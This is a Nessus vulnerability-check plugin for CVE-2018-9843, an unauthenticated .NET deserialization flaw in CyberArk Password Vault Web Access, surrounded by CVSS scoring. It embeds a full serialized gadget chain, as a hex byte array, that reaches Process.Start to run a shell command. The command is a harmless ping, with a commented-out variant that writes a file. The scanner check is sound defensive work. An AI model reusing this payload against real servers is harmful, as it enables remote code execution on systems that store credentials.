CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
98.1%
The CyberArk Password Vault Web Access running on the remote host is affected by a remote code execution vulnerability due to unsafe deserialization of an .NET object. An unauthenticated, remote attacker can exploit this, via a crafted a .NET object, to execute arbitrary .NET code in the context of the IIS server.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(110287);
script_version("1.5");
script_cvs_date("Date: 2019/10/07 15:15:27");
script_cve_id("CVE-2018-9843");
script_bugtraq_id(105180);
script_name(english:"CyberArk Password Vault Web Access .NET Object Deserialization (Direct Check)");
script_summary(english:"Sends a .NET object to trigger an error message.");
script_set_attribute(attribute:"synopsis", value:
"An Identity Management application running on the remote host is affected by
a remote code execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The CyberArk Password Vault Web Access running on the remote host is
affected by a remote code execution vulnerability due to unsafe
deserialization of an .NET object. An unauthenticated, remote
attacker can exploit this, via a crafted a .NET object, to execute
arbitrary .NET code in the context of the IIS server.");
# https://www.redteam-pentesting.de/en/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e1d84c64");
script_set_attribute(attribute:"solution", value:
"Upgrade to CyberArk Password Vault Web Access 9.9.5, 9.10.1, 10.2 or Later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9843");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/09");
script_set_attribute(attribute:"patch_publication_date", value:"2018/02/28");
script_set_attribute(attribute:"plugin_publication_date", value:"2018/06/01");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:cyberark:password_vault");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("cyberark_password_vault_detection.nbin");
script_require_keys("installed_sw/CyberArk Password Vault Web Access");
script_require_ports("Services/www", 80, 443);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");
app = 'CyberArk Password Vault Web Access';
# Plugin will exit if app is not detected on host
get_install_count(app_name:app, exit_if_zero:TRUE);
# Plugin will exit if app is not detected on this port
port = get_http_port(default:80);
install = get_single_install(app_name:app, port:port, exit_if_unknown_ver:FALSE);
url = "/PasswordVault/WebServices/PIMServices.svc/Applications/?Location=\&IncludeSublocations=true";
cmd = 'ping -n 3 localhost';
# vuln verification
#cmd = 'dir > c:\\Windows\\Temp\\hacked.txt';
cmd = '/c ' + cmd;
obj = raw_string(
0x00,0x01,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x0C,0x02,0x00,0x00,0x00,0x49,0x53,0x79,0x73,0x74,0x65,0x6D,0x2C,0x20,0x56,
0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,
0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,
0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,
0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,
0x05,0x01,0x00,0x00,0x00,0x84,0x01,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,
0x6C,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x73,0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,
0x63,0x2E,0x53,0x6F,0x72,0x74,0x65,0x64,0x53,0x65,0x74,0x60,0x31,0x5B,0x5B,0x53,
0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,
0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,
0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,
0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,
0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,
0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x04,0x00,0x00,0x00,0x05,
0x43,0x6F,0x75,0x6E,0x74,0x08,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,0x07,0x56,
0x65,0x72,0x73,0x69,0x6F,0x6E,0x05,0x49,0x74,0x65,0x6D,0x73,0x00,0x03,0x00,0x06,
0x08,0x8D,0x01,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6C,0x6C,0x65,0x63,
0x74,0x69,0x6F,0x6E,0x73,0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,0x2E,0x43,0x6F,
0x6D,0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,
0x60,0x31,0x5B,0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
0x67,0x2C,0x20,0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,
0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,
0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,
0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,
0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,
0x08,0x02,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x09,0x03,0x00,0x00,0x00,0x02,0x00,
0x00,0x00,0x09,0x04,0x00,0x00,0x00,0x04,0x03,0x00,0x00,0x00,0x8D,0x01,0x53,0x79,
0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x73,
0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,0x2E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x69,
0x73,0x6F,0x6E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,0x60,0x31,0x5B,0x5B,0x53,
0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,
0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,
0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,
0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,
0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,
0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x01,0x00,0x00,0x00,0x0B,
0x5F,0x63,0x6F,0x6D,0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x03,0x22,0x53,0x79,0x73,
0x74,0x65,0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,
0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x09,
0x05,0x00,0x00,0x00,0x11,0x04,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x06,0x06,0x00,
0x00) +
mkword(strlen(cmd)) + cmd +
raw_string(
0x06,0x07,0x00,0x00,0x00,0x03,0x63,0x6D,
0x64,0x04,0x05,0x00,0x00,0x00,0x22,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x65,
0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,
0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x03,0x00,0x00,0x00,0x08,0x44,0x65,
0x6C,0x65,0x67,0x61,0x74,0x65,0x07,0x6D,0x65,0x74,0x68,0x6F,0x64,0x30,0x07,0x6D,
0x65,0x74,0x68,0x6F,0x64,0x31,0x03,0x03,0x03,0x30,0x53,0x79,0x73,0x74,0x65,0x6D,
0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,
0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2B,0x44,0x65,0x6C,
0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x2F,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,
0x62,0x65,0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,
0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2F,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,
0x62,0x65,0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,
0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x09,0x08,0x00,0x00,0x00,0x09,
0x09,0x00,0x00,0x00,0x09,0x0A,0x00,0x00,0x00,0x04,0x08,0x00,0x00,0x00,0x30,0x53,
0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,
0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,
0x72,0x2B,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x07,
0x00,0x00,0x00,0x04,0x74,0x79,0x70,0x65,0x08,0x61,0x73,0x73,0x65,0x6D,0x62,0x6C,
0x79,0x06,0x74,0x61,0x72,0x67,0x65,0x74,0x12,0x74,0x61,0x72,0x67,0x65,0x74,0x54,
0x79,0x70,0x65,0x41,0x73,0x73,0x65,0x6D,0x62,0x6C,0x79,0x0E,0x74,0x61,0x72,0x67,
0x65,0x74,0x54,0x79,0x70,0x65,0x4E,0x61,0x6D,0x65,0x0A,0x6D,0x65,0x74,0x68,0x6F,
0x64,0x4E,0x61,0x6D,0x65,0x0D,0x64,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,
0x74,0x72,0x79,0x01,0x01,0x02,0x01,0x01,0x01,0x03,0x30,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,
0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2B,0x44,0x65,
0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x06,0x0B,0x00,0x00,0x00,
0xB0,0x02,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x46,0x75,0x6E,0x63,0x60,0x33,0x5B,
0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,
0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,
0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,
0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,
0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,
0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x2C,0x5B,0x53,0x79,
0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,0x63,
0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,
0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,
0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,
0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,
0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x2C,0x5B,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x44,0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,
0x6F,0x63,0x65,0x73,0x73,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2C,0x20,0x56,
0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,
0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,
0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,
0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,
0x5D,0x5D,0x06,0x0C,0x00,0x00,0x00,0x4B,0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,
0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,
0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,
0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,
0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,
0x30,0x38,0x39,0x0A,0x06,0x0D,0x00,0x00,0x00,0x49,0x53,0x79,0x73,0x74,0x65,0x6D,
0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,
0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,
0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,
0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,
0x30,0x38,0x39,0x06,0x0E,0x00,0x00,0x00,0x1A,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
0x44,0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,
0x65,0x73,0x73,0x06,0x0F,0x00,0x00,0x00,0x05,0x53,0x74,0x61,0x72,0x74,0x09,0x10,
0x00,0x00,0x00,0x04,0x09,0x00,0x00,0x00,0x2F,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,0x62,0x65,
0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,
0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x07,0x00,0x00,0x00,0x04,0x4E,0x61,0x6D,
0x65,0x0C,0x41,0x73,0x73,0x65,0x6D,0x62,0x6C,0x79,0x4E,0x61,0x6D,0x65,0x09,0x43,
0x6C,0x61,0x73,0x73,0x4E,0x61,0x6D,0x65,0x09,0x53,0x69,0x67,0x6E,0x61,0x74,0x75,
0x72,0x65,0x0A,0x53,0x69,0x67,0x6E,0x61,0x74,0x75,0x72,0x65,0x32,0x0A,0x4D,0x65,
0x6D,0x62,0x65,0x72,0x54,0x79,0x70,0x65,0x10,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,
0x41,0x72,0x67,0x75,0x6D,0x65,0x6E,0x74,0x73,0x01,0x01,0x01,0x01,0x01,0x00,0x03,
0x08,0x0D,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x54,0x79,0x70,0x65,0x5B,0x5D,0x09,
0x0F,0x00,0x00,0x00,0x09,0x0D,0x00,0x00,0x00,0x09,0x0E,0x00,0x00,0x00,0x06,0x14,
0x00,0x00,0x00,0x3E,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x69,0x61,0x67,0x6E,
0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x53,
0x74,0x61,0x72,0x74,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,
0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
0x67,0x29,0x06,0x15,0x00,0x00,0x00,0x3E,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,
0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,0x65,
0x73,0x73,0x20,0x53,0x74,0x61,0x72,0x74,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,
0x74,0x72,0x69,0x6E,0x67,0x29,0x08,0x00,0x00,0x00,0x0A,0x01,0x0A,0x00,0x00,0x00,
0x09,0x00,0x00,0x00,0x06,0x16,0x00,0x00,0x00,0x07,0x43,0x6F,0x6D,0x70,0x61,0x72,
0x65,0x09,0x0C,0x00,0x00,0x00,0x06,0x18,0x00,0x00,0x00,0x0D,0x53,0x79,0x73,0x74,
0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x06,0x19,0x00,0x00,0x00,0x2B,0x49,
0x6E,0x74,0x33,0x32,0x20,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x28,0x53,0x79,0x73,
0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,
0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x29,0x06,0x1A,0x00,0x00,0x00,0x32,
0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x49,0x6E,0x74,0x33,0x32,0x20,0x43,0x6F,0x6D,
0x70,0x61,0x72,0x65,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,
0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
0x67,0x29,0x08,0x00,0x00,0x00,0x0A,0x01,0x10,0x00,0x00,0x00,0x08,0x00,0x00,0x00,
0x06,0x1B,0x00,0x00,0x00,0x71,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6D,
0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x60,0x31,0x5B,0x5B,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,0x63,0x6F,0x72,0x6C,
0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,
0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,
0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,
0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,
0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x09,0x0C,0x00,0x00,0x00,0x0A,0x09,0x0C,0x00,
0x00,0x00,0x09,0x18,0x00,0x00,0x00,0x09,0x16,0x00,0x00,0x00,0x0A,0x0B
);
# PVWA can be slow to respond
http_set_read_timeout(30);
token = base64(str: obj);
res = http_send_recv3(
port : port,
method : 'GET',
item : url,
add_headers : make_array('authorization', token),
content_type: 'application/json',
fetch404 : TRUE,
exit_on_fail: TRUE
);
if(isnull(res[2]))
audit(AUDIT_RESP_NOT, port, 'a GET request: No data in the response body');
#
# Patched:
# 403
# {"ErrorCode":"CAWS00001E","ErrorMessage":"Connection to the Vault was terminated."}
if (res[2] !~ "Unable to cast object of type.* to type 'CyberArk.Services.Web.SessionIdentifiers")
{
audit(AUDIT_INST_VER_NOT_VULN, app, install['version']);
}
#
# Vulenrable:
# 403
# {"ErrorCode":"CAWS00001E","ErrorMessage":"Error raised while trying to establish session using session token provided. Error: Unable to cast object of type 'System.Collections.Generic.SortedSet`1[System.String]' to type 'CyberArk.Services.Web.SessionIdentifiers'."}
#
report =
'\nNessus was able to detect the .NET deserialization vulnerability by' +
'\nsending a crafted .NET object.' +
'\n';
security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
98.1%